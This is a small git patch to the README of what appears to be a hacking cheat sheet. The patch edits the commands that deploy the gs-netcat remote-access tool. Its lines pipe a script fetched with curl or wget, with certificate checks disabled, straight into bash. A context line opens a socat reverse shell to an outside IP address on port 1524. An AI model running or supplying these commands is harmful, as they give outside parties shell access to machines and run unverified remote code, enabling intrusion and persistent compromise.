From 6286e64efa2f2df6d39619e16485cf3a8a94acf2 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Wed, 30 Aug 2023 13:06:32 +0100 Subject: [PATCH] https --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cfc473a..7d6925e 100644 --- a/README.md +++ b/README.md @@ -1125,11 +1125,11 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524 Mostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy). ```sh -bash -c "$(curl -fsSLk gsocket.io/x)" +bash -c "$(curl -fsSLk https://gsocket.io/x)" ``` or ```sh -bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)" +bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)" ```